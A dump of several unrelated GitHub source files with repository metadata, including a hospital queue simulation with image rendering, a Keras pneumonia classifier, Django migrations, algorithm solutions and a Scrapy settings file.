if queuing_line[2] > 0:
doctor = 3
queuing_line[2] -= 1
finish_time3 = i + ser_time[finish_people]
finish_people += 1
twait3.append(i)
else:
pass
return(doctor, queuing_line, finish_time1, finish_time2, finish_time3, finish_people,twait1,twait2, twait3)
##### Visualise the queuing procedure
# input patients' picture
patient1_pic = Image.open('1.jpg').resize((75, 75))
patient2_pic = Image.open('2.jpg').resize((75, 75))
patient3_pic = Image.open('3.jpg').resize((75, 75))
def wait_queue(i,img_bg,patient_pic):
if queuing_line[i] == 1:
# put first-class one
img_bg.paste(patient_pic, (500, 212+100*i))
elif queuing_line[i] == 2:
# put first-class two
new2_1 = patient_pic.copy()
img_bg.paste(patient_pic, (500, 212+100*i))
img_bg.paste(new2_1, (400, 212+100*i))
elif queuing_line[i] == 3:
# put first-class three
new2_1 = patient_pic.copy()
new2_2 = patient_pic.copy()
img_bg.paste(patient_pic, (500, 212+100*i))
img_bg.paste(new2_1, (400, 212+100*i))
img_bg.paste(new2_2, (300, 212+100*i))
elif queuing_line[i] == 4:
# put first-class four
new2_1 = patient_pic.copy()
new2_2 = patient_pic.copy()
new2_3 = patient_pic.copy()
img_bg.paste(patient_pic, (500, 212+100*i))
img_bg.paste(new2_1, (400, 212+100*i))
img_bg.paste(new2_2, (300, 212+100*i))
img_bg.paste(new2_3, (200, 212+100*i))
elif queuing_line[i] == 5:
# put first-class four
new2_1 = patient_pic.copy()
new2_2 = patient_pic.copy()
new2_3 = patient_pic.copy()
new2_4 = patient_pic.copy()
img_bg.paste(patient_pic, (500, 212+100*i))
img_bg.paste(new2_1, (400, 212+100*i))
img_bg.paste(new2_2, (300, 212+100*i))
img_bg.paste(new2_3, (200, 212+100*i))
img_bg.paste(new2_4, (100, 212+100*i))
elif queuing_line[i] >= 6:
# put first-class four
new2_1 = patient_pic.copy()
new2_2 = patient_pic.copy()
new2_3 = patient_pic.copy()
new2_4 = patient_pic.copy()
new2_5 = patient_pic.copy()
img_bg.paste(patient_pic, (500, 212+100*i))
img_bg.paste(new2_1, (400, 212+100*i))
img_bg.paste(new2_2, (300, 212+100*i))
img_bg.paste(new2_3, (200, 212+100*i))
img_bg.paste(new2_4, (100, 212+100*i))
img_bg.paste(new2_5, (5, 212+100*i))
else:
pass
return img_bg
def sickroom(img_bg, patient1_pic, patient2_pic, patient3_pic, doctor):
if doctor == 1:
sick1 = patient1_pic.copy()
img_bg.paste(sick1, (900,220))
elif doctor == 2:
sick2 = patient2_pic.copy()
img_bg.paste(sick2, (900, 220))
elif doctor == 3:
sick3 = patient3_pic.copy()
img_bg.paste(sick3, (900, 220))
else:
draw = ImageDraw.Draw(img_bg)
draw.rectangle([(700, 150), (1000, 300)], fill=(0, 255, 0))
return img_bg
#simulate the process
for i in range(simu_num):
# generate the background
img_bg = Image.new("RGB", (1000, 700), 'white')
# generate the waitting queue
draw = ImageDraw.Draw(img_bg)
draw.line([(100, 200), (600, 200)], fill=(255, 0, 0), width=7)
draw.line([(100, 300), (600, 300)], fill=(255, 0, 0), width=7)
draw.line([(100, 400), (600, 400)], fill=(255, 0, 0), width=7)
draw.line([(100, 500), (600, 500)], fill=(255, 0, 0), width=7)
#set the service table
draw.rectangle([(700, 150), (1000, 300)], fill=(0, 255, 0))
# set the time table
font = ImageFont.truetype('arial.ttf', 25)
draw.text((50, 50), "TIME: {} day {}:{}".format(i//3600, i // 60, i % 60), fill=(0, 0, 0), font=font)
draw.text((600, 250), "First", fill=(255, 0, 0), font=font)
draw.text((600, 350), "Second", fill=(255, 0, 0), font=font)
draw.text((600, 450), "Third", fill=(255, 0, 0), font=font)
draw.text((700, 120), "Sickroom", fill=(255, 0, 0), font=font)
time_axis.append(x1[i]+x2[i]+x3[i])
#simulate queuing process
if time_axis[i]>0:
#update queue
queuing_line = [queuing_line[0] + x1[i], queuing_line[1] + x2[i], queuing_line[2] + x3[i]]
# put our cute patients in
#print(queuing_line,doctor)
# collect the patient's time axis
(tcome1, tcome2, tcome3) = record_come_time(i, x1, x2, x3, tcome1, tcome2, tcome3)
#print(tcome1,tcome2,tcome3)
#There is someone in first-class line
(doctor, queuing_line, finish_time1, finish_time2, finish_time3, finish_people,twait1,twait2, twait3) \
= service_rule(i, finish_time1, finish_time2, finish_time3, queuing_line, doctor, finish_people, ser_time,twait1,twait2, twait3)
#print(twait1,twait2,twait3)
W_q1 = average(tcome1, twait1)
img_bg = sickroom(img_bg, patient1_pic, patient2_pic, patient3_pic, doctor)
font1 = ImageFont.truetype('arial.ttf', 20)
draw.text((700, 360), "Wq_1 = {}".format(W_q1), fill=(0, 0, 0), font=font1)
W_q2 = average(tcome2, twait2)
draw.text((700, 400), "Wq_2 = {}".format(W_q2), fill=(0, 0, 0), font=font1)
W_q3 = average(tcome3, twait3)
draw.text((700, 440), "Wq_3 = {}".format(W_q3), fill=(0, 0, 0), font=font1)
#print(W_q1, W_q2, W_q3)
img_bg = wait_queue(0, img_bg, patient1_pic)
img_bg = wait_queue(1, img_bg, patient2_pic)
img_bg = wait_queue(2, img_bg, patient3_pic)
#img_bg.show()
img_bg.save('./picss/{}.jpg'.format(i))
fourcc = cv2.VideoWriter_fourcc(*'XVID')
fps = 100
size = (1000,700)
out = cv2.VideoWriter('camera_test3.avi', fourcc, fps, size)
for i in range(60*24*10):
pic = cv2.imread('./picss/{}.jpg'.format(i))
out.write(pic)
out.release()
pass
| [
"noreply@github.com"
] | noreply@github.com |
5f69045f7aa47cdf638b20fe0213be9eee7ea9cf | 37c38b97d0a4b8098ec3c35b7122afb1fbb9eac9 | /newke/py36/py36/class_biao.py | ffce719d491f697100ed5daab2206f4b953fd2aa | [] | no_license | lionheartStark/sword_towards_offer | 8c2f9015a427317375d53eee982d630ffd4fa9c0 | cb3587242195bb3f2626231af2da13b90945a4d5 | refs/heads/master | 2022-12-02T20:50:18.789828 | 2020-08-23T02:00:48 | 2020-08-23T02:00:48 | 266,257,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | from typing import List
from collections import defaultdict,deque
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
need_map = defaultdict(set)
for i in prerequisites:
need, be_need = i
need_map[need].add(be_need)
a_solution = []
queue = deque()
count = 0
for i in range(numCourses):
if i not in need_map:
queue.append(i)
count += 1
while queue:
nowican = queue.popleft()
a_solution.append(nowican)
should_rm = []
for k,v in need_map.items():
if nowican in v:
v.remove(nowican)
if len(v) == 0:
should_rm.append(k)
queue.append(k)
count += 1
for m in should_rm:
need_map.pop(m)
can = (count == numCourses)
if can:
return a_solution
else:
return []
| [
"1003146780@qq.com"
] | 1003146780@qq.com |
5a520bbe602829e4a1a651efc846844f07970208 | bcfa02c21a73798872bbb28303233d1f0039cf00 | /server/www/teleport/webroot/app/controller/dashboard.py | 65a5f2eea63c35642406ac5a3c52e530667224cb | [
"Apache-2.0"
] | permissive | zhoulhb/teleport | 6301cd50c951bcbac21cbe24017eb8421ff57adc | 54da194697898ef77537cfe7032d774555dc1335 | refs/heads/master | 2021-11-10T17:10:59.661130 | 2021-11-09T11:16:19 | 2021-11-09T11:16:19 | 192,643,069 | 0 | 0 | Apache-2.0 | 2019-06-19T02:20:53 | 2019-06-19T02:20:52 | null | UTF-8 | Python | false | false | 361 | py | # -*- coding: utf-8 -*-
from app.const import *
from app.base.controller import TPBaseHandler, TPBaseJsonHandler
from app.model import stats
class IndexHandler(TPBaseHandler):
def get(self):
ret = self.check_privilege(TP_PRIVILEGE_LOGIN_WEB)
if ret != TPE_OK:
return
self.render('dashboard/index.mako')
| [
"apex.liu@qq.com"
] | apex.liu@qq.com |
dac2133cf620ea789b31f150bedf585eb47f66bf | 831fd793641b88d15dfb437ea305928533f4b471 | /myapi/migrations/0002_auto_20190218_2333.py | 5f20c29ba2f76ef22cc13d8a6dc999a13eec2b98 | [] | no_license | dyohan9/django_rest_framework_project | 81774c031d8691c872bdaeea59e929c2f385dc44 | 7bfcd6a99b204677e011b3399c592e787fc929a3 | refs/heads/master | 2020-06-01T04:35:00.609800 | 2019-02-18T20:01:35 | 2019-02-18T20:01:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,198 | py | # Generated by Django 2.1.4 on 2019-02-18 18:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('myapi', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Paradigm',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Programmer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.AlterField(
model_name='language',
name='paradigm',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myapi.Paradigm'),
),
migrations.AddField(
model_name='programmer',
name='languages',
field=models.ManyToManyField(to='myapi.Language'),
),
]
| [
"amirsavvy"
] | amirsavvy |
d471b1d17f445c042a7a07f4fe994e008c61231f | 466afe028fbe4940f88666a5dbd424535fd5aef6 | /ex32.py | b3f3168306d20676bcc728d8792516fe1af08258 | [] | no_license | wenyan666/wenyan-python | 1059b8872b8a5cbbf75b605ee82e3f33fe2e2c82 | 4c974fa897b906f17646b904a1d763ed1dafbab1 | refs/heads/master | 2021-01-12T05:44:44.425185 | 2017-01-17T07:57:42 | 2017-01-17T07:57:42 | 77,188,401 | 0 | 0 | null | 2017-01-14T00:41:58 | 2016-12-23T01:38:37 | Python | UTF-8 | Python | false | false | 959 | py | the_count = [1, 2, 3, 4, 5]
fruits = ['apples', 'oranges', 'pears', 'apricots']
change = [1, 'pennies', 2, 'dimes', 3, 'quarters']
# this first kind of for-loop goes therough a list
for number in the_count:
print ("This is count %d" % number)
# same as above
for fruit in fruits:
print ("A fruit of type: %s" % fruit)
# also we can go through mixed list too
# notice we have to use %r since we don't know what's in it
for x in change:
print ("I got %r" % x)
# we can also build lists, first start with empty ones
elemengts = []
# then use the range function to do 0 to 5 counts
for y in range(0, 6):
print ("Adding %d to the list." % y)
# append is a function that lists Understand
elemengts.append(y)
for i in elemengts:
print ("Elemengt was: %d" % i)
why = []
why.append(y)
for i in why:
print("Why just give me one number: %d?" %i)
another = range(0, 3)
for i in another:
print ("Skip the range and get: %d" % i)
| [
"wenyan.zhang@foxmail.com"
] | wenyan.zhang@foxmail.com |
3a5fa82b03d6e08eaa27964bb6992a07d039f621 | 976fc1c0572d964d83c90299a3fbdc7a8f0925a8 | /hello world.py | bda13a892071ef123ac78eab3579514d5daceae1 | [] | no_license | bingoa/learnpython | e19c1b254537a62d67204fcfc3f52d247027bbda | e5bfa47af204b82346bb51156b1997d9d01ea125 | refs/heads/master | 2021-01-17T18:07:45.474080 | 2016-08-01T04:45:26 | 2016-08-01T04:45:26 | 64,636,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print "Hello world"
| [
"noreply@github.com"
] | noreply@github.com |
4d0f80be234b2a2431c8735b497e73bf26b97c13 | 3de01124b8cca1267126c807d6c07fa0fce681a4 | /baselineNet_Nopad_Reg_150Epoch_Leaky.py | 113303489847152eeaead001949d11df0b4282da | [] | no_license | ljehezkiel/regularization-pneumonia | 8f92e258a00087d415ec8ea7826608731fce1c1e | e15f216d5d576faefbb81309f027ed6a5ee489ae | refs/heads/main | 2023-02-19T10:10:33.920656 | 2021-01-25T19:24:37 | 2021-01-25T19:24:37 | 332,841,673 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,352 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import os
import cv2
import keras
from keras.models import Sequential
from keras.layers import Conv2D,MaxPooling2D,Dense,Flatten,Activation,Dropout,LeakyReLU
data=[]
labels=[]
Pneumonia=os.listdir("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/PNEUMONIA/")
for a in Pneumonia:
try:
image=cv2.imread("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/PNEUMONIA/"+a)
image_from_array = Image.fromarray(image, 'RGB')
size_image = image_from_array.resize((64, 64))
data.append(np.array(size_image))
labels.append(0)
except AttributeError:
print("")
Normal=os.listdir("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/NORMAL/")
for b in Normal:
try:
image=cv2.imread("../content/drive/My Drive/Colab Notebooks/Colab Dataset/chest_xray/train/NORMAL/"+b)
image_from_array = Image.fromarray(image, 'RGB')
size_image = image_from_array.resize((64, 64))
data.append(np.array(size_image))
labels.append(1)
except AttributeError:
print("")
Cells=np.array(data)
labels=np.array(labels)
np.save("Cells_64x64x3",Cells)
np.save("labels_64x64x3",labels)
Cells=np.load("/content/drive/My Drive/Colab Notebooks/Colab Dataset/Cells_64x64x3.npy")
labels=np.load("/content/drive/My Drive/Colab Notebooks/Colab Dataset/labels_64x64x3.npy")
s=np.arange(Cells.shape[0])
np.random.shuffle(s)
Cells=Cells[s]
labels=labels[s]
num_classes=len(np.unique(labels))
len_data=len(Cells)
(x_train,x_test)=Cells[(int)(0.1*len_data):],Cells[:(int)(0.1*len_data)]
x_train = x_train.astype('float32')/255
x_test = x_test.astype('float32')/255
train_len=len(x_train)
test_len=len(x_test)
(y_train,y_test)=labels[(int)(0.1*len_data):],labels[:(int)(0.1*len_data)]
y_train=keras.utils.to_categorical(y_train,num_classes)
y_test=keras.utils.to_categorical(y_test,num_classes)
from keras.preprocessing.image import ImageDataGenerator
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)
zoom_range = 0.1, # Randomly zoom image
width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)
height_shift_range=0.1, # randomly shift images vertically (fraction of total height)
horizontal_flip=False, # randomly flip images
vertical_flip=False) # randomly flip images
datagen.fit(x_train)
model=Sequential()
model.add(Conv2D(filters=32,kernel_size=3,input_shape=(64,64,3)))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=64,kernel_size=3))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=128,kernel_size=3))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Conv2D(filters=256,kernel_size=3))
model.add(LeakyReLU())
model.add(MaxPooling2D(pool_size=2))
model.add(Flatten())
model.add(Dense(500))
model.add(LeakyReLU())
model.add(Dropout(0.2))
model.add(Dense(500))
model.add(LeakyReLU())
model.add(Dropout(0.2))
model.add(Dense(500))
model.add(LeakyReLU())
model.add(Dropout(0.2))
model.add(Dense(2,activation="softmax"))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
history = model.fit_generator(datagen.flow(x_train,y_train),
epochs = 150, validation_data = (x_test,y_test))
model.save("/content/drive/My Drive/baselinenet_nopad_reg_150epoch_leaky_model.h5")
from sklearn.metrics import confusion_matrix
pred = model.predict(x_test)
pred = np.argmax(pred,axis = 1)
y_true = np.argmax(y_test,axis = 1)
CM = confusion_matrix(y_true, pred)
from mlxtend.plotting import plot_confusion_matrix
fig, ax = plot_confusion_matrix(conf_mat=CM , figsize=(5, 5))
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
71d6e1fbcb51bf821ba0e4468063c840241fe175 | 4bb5e0749321aa0e080964b81dddd98bafd3916b | /main.py | cbaf58b15de1f46a8919e8917b649e7c3c673c6d | [] | no_license | Cyberdog90/ppm2png | c7151adf680776014c726b35e96cfb2dd8c67431 | d4a034d3cb85e739f85a42b74783061eabd887dd | refs/heads/master | 2020-04-24T22:36:43.362611 | 2019-06-05T15:34:25 | 2019-06-05T15:34:25 | 172,317,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | import os
import tkinter.filedialog
import cv2
def main():
root = tkinter.Tk()
root.withdraw()
file_type = [("file", ".ppm")]
idir = os.path.abspath(os.path.dirname(__file__))
file = tkinter.filedialog.askopenfilename(filetypes=file_type,
initialdir=idir)
base_img = cv2.imread("base.png", 1)
f = open(file)
ppm = f.readlines()
f.close()
res = ppm[1].replace("\n", "")
w, h = map(int, res.split())
ppm_to_png(w, h, ppm, base_img)
def ppm_to_png(w, h, ppm, base_img):
bi = cv2.resize(base_img, (w, h))
count = 0
for i in range(h):
for j in range(w):
r, g, b = map(int, ppm[count + 3].split())
bi[i, j] = (b, g, r)
count += 1
cv2.imwrite("result.png", bi)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
d2561f51cfd801bd95c1b923663a1a7c0d8c264f | 433ddd55ef30e489761b0dd996325e6d48e989fc | /fab_function.py | a44b638e2eff1d5eeb45fc88de313df9c5c3dabd | [] | no_license | vikramchdry/Python-coding-Practice | 91a9de056c4ea4a837e048a689f0393bf6156156 | 7b5381353261273bf4ac314581b828475e635cb2 | refs/heads/master | 2020-09-12T22:33:01.198320 | 2019-11-19T11:07:45 | 2019-11-19T11:07:45 | 222,581,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | '''def fib(n):
if n <= 1:
return n
return fib(n-1)+fib(n-2)
if __name__=='__main__':
n = 100
print (fib(n)) '''
'''def fib(n):
if n<0 :
return ("Incorrect number")
elif n == 0:
return 0
elif n== 1:
return 1
else:
return fib(n-1)+fib(n-2)
print(fib(9))'''
#--------------->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
def fib(n):
arr = []
| [
"ec1029231058@gmail.com"
] | ec1029231058@gmail.com |
e788e26f2c6b9a873116b600ce696a4ae6840804 | 6ad15dc96aa9837cb620eeaf56fbb92fa3f98075 | /Cosmo_Maf/Load_X1_C.py | 0230b41c01bd8c06790958b8b9d858dbb0737aa8 | [] | no_license | pgris/SN_Simulation | 56e100d5e12149b48b5e42004b3e767a327b7303 | 279ed244e37a81c52408878fdb63783367baa8d6 | refs/heads/master | 2021-09-12T02:14:04.051412 | 2018-04-13T16:05:35 | 2018-04-13T16:05:35 | 108,561,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,115 | py | import numpy as np
class Load_X1_Color:
def __init__(self,stretch,color,percent=0.95,name_low_z='Dist_X1_Color_low_z.txt',name_high_z='Dist_X1_Color_high_z.txt'):
#print 'alors man',stretch,color
self.name_low_z=name_low_z
self.name_high_z=name_high_z
self.tab=self.Get_X1_Color_Distribution(stretch,color,percent)
def Load_File(self,filename):
res=np.loadtxt(filename, dtype={'names': ('x1', 'c', 'weight_x1','weight_c','weight_tot'),'formats': ('f8', 'f8', 'f8','f8','f8')})
res.sort(order='weight_tot')
res[:]=res[::-1]
return res
def Get_X1_Color_Distribution(self,stretch,color,percent):
Dist_X1_Color={}
Dist_X1_Color['low_z']=self.Load_File(self.name_low_z)
Dist_X1_Color['high_z']=self.Load_File(self.name_high_z)
#print 'loadad',len(Dist_X1_Color['low_z'])
res={}
if stretch > -90. and color > -90.:
for val in ['low_z','high_z']:
res[val]=self.Select(Dist_X1_Color[val],stretch,color)
else:
for val in ['low_z','high_z']:
res[val]=self.Select_percent(Dist_X1_Color[val],percent)
#print 'there',val,len(res[val])
return res
def Select(self,ar,stretch,color):
#print ar
#print 'looking for',stretch,color
idx = (ar['x1']==stretch)&(ar['c']==color)
sel=ar[idx]
if len(sel)==0:
print 'problem',stretch,color,'not found - Weights set to 1'
return np.asarray((stretch,color,1.,1.,1.),dtype=ar.dtype)
else:
return sel
def Select_percent(self,dist,per):
sum_w=0
res=None
for i,val in enumerate(dist):
sum_w+=val['weight_tot']
#print i,val,sum_w
if sum_w <= per:
if res is None:
res=np.array(val, dtype=val.dtype)
else:
res=np.vstack([res,np.array(val, dtype=val.dtype)])
else:
return res
return res
| [
"gris@clermont.in2p3.fr"
] | gris@clermont.in2p3.fr |
fd96e32bf7db6694a0f243a5869a17fb1f98af82 | 2b1d533d2ee0d7130ca9f0f58c84864ebf1f4fad | /stonkapi/authentication/migrations/0001_initial.py | f36683a9b13c2a24e6c0d2e52594f842c76705eb | [] | no_license | ohack38/stonkio | 9fb654d0865ad423d334849f2102b38d89d3531a | a3819c1c7826849490625ba75e147b09bbeb407d | refs/heads/main | 2023-03-02T09:01:30.073437 | 2021-02-04T17:26:48 | 2021-02-04T17:26:48 | 315,384,280 | 0 | 0 | null | 2021-02-04T17:26:49 | 2020-11-23T17:04:15 | Python | UTF-8 | Python | false | false | 1,967 | py | # Generated by Django 3.1.3 on 2020-11-26 18:05
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(db_index=True, max_length=255, unique=True)),
('email', models.EmailField(db_index=True, max_length=255, unique=True)),
('is_verified', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| [
"ohackman1@gmail.com"
] | ohackman1@gmail.com |
693dea38ccdfbc2a6a8a08d0676207bd8adf309c | 2f66f3aad39cccce110ba4f2065cb1ccc6131216 | /3/dayThree.py | 06f4c2a77a7b95d47f9e36ec86a65e31e3d356a2 | [] | no_license | BeranekP/advent_of_code | 43e89fd7399396dc9626a701b28b8c981162fd10 | 3b99a2448b383531dc2234cc04c1e67a0e5538ea | refs/heads/master | 2020-09-26T03:57:56.235679 | 2019-12-13T13:23:38 | 2019-12-13T13:23:38 | 226,159,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | import matplotlib.pyplot as plt
# open input file a strip newline signs and commas
wires = [line.rstrip('\n') for line in open('input.txt')]
wires = [wire.split(",") for wire in wires]
def calcXY(wire):
""" Calculates coords [X,Y] for each input direction and a number of steps """
wireXY = [[0, 0]]
steps = [0]
for dirCoord in wire:
direction = dirCoord[0]
coord = int(dirCoord[1:])
X = wireXY[-1][0] # last X
Y = wireXY[-1][1] # last Y
step0 = steps[-1] # last step count
# check direction and compute coords with step 1
if direction == 'R':
for i in range(1, coord+1):
wireXY.append([X+i, Y])
elif direction == 'L':
for i in range(1, coord+1):
wireXY.append([X-i, Y])
elif direction == 'U':
for i in range(1, coord+1):
wireXY.append([X, Y+i])
elif direction == 'D':
for i in range(1, coord+1):
wireXY.append([X, Y-i])
for i in range(1, coord+1):
steps.append(step0+i)
return (wireXY, steps)
wireXY_1, steps1 = calcXY(wires[0])
wireXY_2, steps2 = calcXY(wires[1])
def analyzeWires(wire1, steps1, wire2, steps2):
# convert to tuples for sets
iwire1 = [tuple(lst) for lst in wire1]
iwire2 = [tuple(lst) for lst in wire2]
# find intersections using set
intersectionsCoords = set(iwire1).intersection(iwire2)
# get indices for intersections except (0,0)
indicesA = [iwire1.index(item)
for item in intersectionsCoords if item != (0, 0)]
indicesB = [iwire2.index(item)
for item in intersectionsCoords if item != (0, 0)]
# get coords for intersections from inputs
intersections = [iwire1[i] for i in indicesA]
# calculates Manhattan/Taxicab distance
Manhattan = [(abs(item[0])+abs(item[1]))
for item in intersections]
# get minimnal Manhattan
minimalManhattan = min([item for item in Manhattan if item != 0])
# find corresponding intersection
minimalManhattanCoordsIdx = Manhattan.index(minimalManhattan)
# using intersection because of abs in Manhattan
minimalManhattanCoords = intersections[minimalManhattanCoordsIdx]
# get steps for each curve
stepsA = [steps1[i] for i in indicesA]
stepsB = [steps2[i] for i in indicesB]
# total number of steps for each intersection
totalSteps = [stepsA[i] + stepsB[i] for i in range(len(stepsA))]
# get coords of the intersection with minimal total steps
indexTotal = totalSteps.index(min(totalSteps))
intersectionsSteps = intersections[indexTotal]
# visualize
# wire 1
plt.plot(*zip(*wireXY_1), color='steelblue')
# wire 2
plt.plot(*zip(*wireXY_2), color='tomato')
# intersections
plt.scatter(*zip(*intersections), color='black',
s=10, zorder=10, label='intersections')
# minimal Manhattan
plt.scatter(
minimalManhattanCoords[0], minimalManhattanCoords[1], color='lawngreen', marker="X", edgecolors='black', s=100, zorder=10, label='min. manhattan = ' + str(minimalManhattan))
# minimal steps
plt.scatter(
intersectionsSteps[0], intersectionsSteps[1], color='goldenrod', marker="X", edgecolors='black', s=100, zorder=10, label='min. steps = ' + str(min(totalSteps)))
plt.legend(loc='upper right')
return intersections, minimalManhattan, min(totalSteps)
intersections, minimalManhattan, minTotalSteps = analyzeWires(
wireXY_1, steps1, wireXY_2, steps2)
print(f'Minimal Manhattan: {minimalManhattan}\nMinimal steps: {minTotalSteps}')
plt.show()
| [
"pavel.beranek@centrum.cz"
] | pavel.beranek@centrum.cz |
60009b93ed10dee11d525edfdb7bbf603119d454 | 2c961f368bb5c4df37f43d8a40399c35ef50b7ea | /config.py | 858ffcbbcb35d3a05e5cc22e72d6688805ffbf6d | [
"MIT"
] | permissive | bestend/kakao_arena-recommendation | b3494db98196c78e6b8b9f81f8b0167c75aeafef | 70f09766fe9d0f7e8267dd5a577f12e26c471d14 | refs/heads/master | 2023-03-31T00:57:23.163823 | 2019-07-24T14:10:29 | 2019-07-24T14:10:29 | 198,434,540 | 2 | 0 | MIT | 2023-03-24T21:57:49 | 2019-07-23T13:18:21 | Python | UTF-8 | Python | false | false | 466 | py | import os
from datetime import datetime
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
RESOURCE_DIR = ROOT_DIR + '/../res/'
CACHE_DIR = ROOT_DIR + '/../cache/'
MAX_USER_SEQUENCE_LEN = 20
MAX_SEARCH_KEYWORD_LEN = 20
ARTICLE_EMBEDDING_SIZE = 200
BEGIN_ARTICLE_TIME = datetime(2015, 1, 1, 0, 0)
END_ARTICLE_TIME = datetime(2019, 2, 22, 0, 0)
TOKEN_PAD = '<PAD>' # Token for padding
TOKEN_UNK = '<UNK>' # Token for unknown words
VALUE_PAD = 0
VALUE_UNK = 1
| [
"infend@gmail.com"
] | infend@gmail.com |
91e61e3f950f46f177a4001f65690a53add7f6f1 | 1765ebc1c393ab4720c5fc5f9397516f5d66cfce | /setup.py | de4fc91885a05f03e2c2bf89d2af47d2323230c1 | [
"MIT"
] | permissive | Lukasa/rproxy | d1db08aa99470c3649258254ead291c6dbd2d202 | c15f9f56608a53db19d4f3737f05dfd02d66bc60 | refs/heads/master | 2020-12-28T22:46:48.225095 | 2016-06-30T08:27:23 | 2016-06-30T08:27:23 | 67,593,070 | 0 | 0 | null | 2016-09-07T09:35:22 | 2016-09-07T09:35:22 | null | UTF-8 | Python | false | false | 502 | py | from setuptools import setup
setup(
name='rproxy',
description='A super simple reverse proxy.',
long_description=open("README.rst").read(),
author='Amber Brown',
author_email='hawkowl@atleastfornow.net',
packages=['rproxy', 'twisted.plugins'],
package_dir={"": "src"},
install_requires=[
'twisted >= 15.5.0',
'pyopenssl',
'txsni',
'incremental',
],
zip_safe=False,
setup_requires=["incremental"],
use_incremental=True,
)
| [
"hawkowl@atleastfornow.net"
] | hawkowl@atleastfornow.net |
bbb72ffa923b27d537784da348b18c9fcf06c497 | 44c88063c9768bee3d7c6a01fa571748aec59073 | /scrapy/miao/opendv/opendv/settings.py | 8d7d5207ed637af13cc287af5b619fe130d2419f | [] | no_license | K-G-1/sprider | 0e5b10d61edba1f76e7e6dd936f34caa0a65c8a7 | dd91306d61363421ab5c0ae59565065475fba237 | refs/heads/master | 2021-04-30T14:39:06.061003 | 2018-03-11T13:28:44 | 2018-03-11T13:28:44 | 121,222,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,988 | py | # -*- coding: utf-8 -*-
# Scrapy settings for opendv project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'opendv'
SPIDER_MODULES = ['opendv.spiders']
NEWSPIDER_MODULE = 'opendv.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'opendv (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
